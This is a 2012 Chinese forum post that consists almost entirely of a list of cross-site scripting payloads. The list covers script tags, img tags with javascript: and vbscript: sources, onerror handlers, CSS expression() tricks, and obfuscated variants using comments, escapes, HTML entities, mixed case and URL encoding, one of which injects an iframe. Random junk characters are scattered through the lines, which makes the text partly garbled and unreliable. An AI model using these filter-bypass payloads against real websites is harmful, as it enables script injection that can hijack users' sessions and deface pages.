<script>alert("跨站")</script> (最常用)9 e. n g: _( v. Y2 @
<img scr=javascript:alert("跨站")></img>5 a1 _; Z l" J- g" L( M8 H
<img scr="javascript: alert(/跨站/)></img>
- _& s1 |3 v3 R' c4 Z; j' C<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
, A5 Q2 ]1 o& Y- `% l<img scr="#" onerror=alert(/跨站/)></img>
& v4 R5 g: Q$ a; d<img scr="#" style="xss:expression(alert(/xss/));"></img>- d b9 e: Z8 J
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)1 ?( A$ r) s U& q9 a7 @% m
<img src=vbscript:msgbox ("xss")></img>
; b2 _3 M* B6 w, \<style> input {left:expression (alert('xss'))}</style>, i0 v5 t9 c/ M( y2 r D0 s
<div style={left:expression (alert('xss'))}></div>
$ T; ^0 ^& y* \/ P, K<div style={left:exp/* */ression (alert('xss'))}></div>
+ V7 [' ~$ {$ h0 J: T7 ?<div style={left:\0065\0078ression (alert('xss'))}></div>% ?8 J( K, x- O9 }
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
8 o0 Z. y- ~6 `/ |unicode <div style="{left:expRessioN (alert('xss'))}">
$ Y9 g- I1 K& {5 P s0 |, d
% a' @! T, f6 x' p0 z F"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>[": v+ K8 Q6 r0 `; f& o' G: j7 i8 N
|
发表于 2012-9-13 17:15:04
收藏
支持
反对